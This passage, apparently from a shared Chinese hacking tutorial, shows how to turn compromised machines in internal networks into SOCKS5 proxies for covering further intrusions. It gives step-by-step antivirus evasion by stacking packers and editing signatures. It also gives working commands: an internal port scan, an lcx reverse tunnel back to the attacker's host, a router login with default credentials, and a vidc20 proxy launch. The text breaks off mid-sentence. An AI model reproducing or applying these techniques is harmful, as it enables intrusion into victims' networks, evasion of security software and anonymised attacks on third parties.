将肉鸡做成sock5服务器.docVIP

话说在挂马得到大量肉鸡以后，众黑友可能都在想如何利用手中的这些战利品。有人喜欢偷窥人家的隐私，有的人可能就会用木马的键盘记录盗取人家的QQ密码，还有的人可能要盗取人家的宽带上网帐号充Q币。可大家有没有想到过将内网中的这些肉鸡作成SOCKS5服务器呢?这样的话，我们以后入侵就可以用这些肉鸡作跳板，黑人家也会安全的多了。有人说内网中作SOCKS5服务器不可能，即使作成了也无法利用，好，今天我就将我的一些实践经验写出来与大家共享，没什么技术含量，大家交流一下，如果大家有更好的方法，还请不吝赐教哟! 　　首先介绍一下使用的工具，lcx.exe 这是一个反向连接的内网端口映射工具，VIDC20.exe也是一个端口映射工具，不过它也有代理服务器的功能，支持http/socks4/socks5代理，支持代理验证，支持udp代理，支持二级代理;还有S扫描器，这个只有一个可执行文件，小巧方便，扫端口最合适了。这些工具在网上都有下载，在作代理服务之前，我们需要先作一下免杀，因为大部分杀毒软件是杀lcx.exe和S扫描器的，如果不作免杀，那一上传就可能被杀毒软件给杀掉，如图1： 图1 　　像这种强悍的卡巴，在命令行下是没有办法中止的，所以只能作免杀了，其他的杀毒软件在命令行下可以中止，不过需要一些技巧，因为它们都有线程保护，用常规的方法是中止不了的。我曾经在命令行下干掉过瑞星，只是方法比较繁琐，所以就不在这里演示了。至于免杀方法嘛，只要简单的加下壳就可以过关了，据我实验，先加个北斗3.5，再加aspack 2.12，之后再加北斗3.5，这样处理后绝大部分杀软件就不杀这两个程序了，呵呵。简单吧，杀毒软件也是会区别对待的，如果是一些流行木马，加这三重壳是不能免杀的，对于一些不太重要的黑客工具，杀毒软件就会显得相对宽松的多了。我们就是钻的杀毒软件的这个空子，如果是加了三重壳也过不了杀毒软件，那就不要怕麻烦将它们的特征码给修改掉，就可以过杀毒软件了，修改的方法网上有许多动画，大家可以自己找找，我的PCSHARE马就是这样作的，过卡巴，瑞星、江民、瑞星、金山、诺顿、趋势等杀毒软件很轻松，也可以轻松过各种查马工具，这就是我修改特征码后加了三重壳作成的，一个超强的工具。呵呵。有些跑题了，言归正传。 　　工具准备完备后，下面开始作代理了。首先打开你的木马客户端程序，将上面的这些工具上传到内网中的肉鸡上，就放在WINDOWS目录里吧，文件名嘛，最好改一下，免得引起对方注意。打开对方的命令符，键入命令：ipconfig /all查看一下肉鸡的IP地址，如：，得到这个本机及网关的IP地址以后，我们就可以用S扫描器对同它同一网段的IP地址进行扫描，看这台肉鸡的网关是什么类型的。S扫描器相信大家都会用了吧。 　　命令行：s-jk tcp 55 80,23,3389,1433,139,445 20 　　这个s-jk是我加三重壳免杀后的S扫描器，这条命令在整个网段中扫描开放139 3389 1433 80 23端口的主机，呵呵，这是为渗透内部网络作准备，也许有很重要的信息出现呢。哈哈。扫描结果如下图2： 图2 　　经过扫描发现这台肉鸡的网关开放80号端口，这说明这台网关一定是台路由器。那怎样登录进它的路由器呢?大家都知道宽带路由器在外网中是不能登录的，只能由它的内部网络登录，难道要进肉鸡的屏幕控制，用肉鸡的IE登录?非也，这样很容易暴露，再说肉鸡上的管理员也许现在正在电脑前工作，你是根本没有办法进行控制的，下面在自己的电脑上打开命令提示符，命令：lcx -listen 21 8000 再回到肉鸡的CMD下，命令：lcx -slave 52 21 80 解释一下：52是我的外网IP，这样就将肉鸡的宽带路由器的80端口映射到了我的电脑的21端上了，我连接本机的8000端口就可以了。如图3： 图3 　　下一步就要打开IE，地址栏中键入：:8000回车后，盼望已久的并且很熟悉的登录界面出现了。这正是宽带路由器的登录界面，只不过这不是我的宽带路由器，而是另一个局域网的宽带路由器，我熟练的键入的默认用户名及密码，admin admin，确定后成功登录了。如图4、图5。 图4 图5 　　接下来的工作简直就是轻车熟路了，设置一个虚拟服务器指向这台肉鸡，端口设置成了个陌生的端口，不要设置成8080，因为宽带路由器要使用这个端口，它是不允许设置成这个端口的，我设置的是2233，保存后，我们再回到肉鸡的命令行下，命令：vidc20 -d -p 2233 这个命令的意思就是以控制台的方式启动vidc20.exe这个程序，开2233服务端口提供代理服务。这台肉鸡已经开始提供SOCK5服务了，并且路由器上的映射也已经正常工作，我们要作的就是打开SOCK5客户端程序，设置一下SOCKS5服务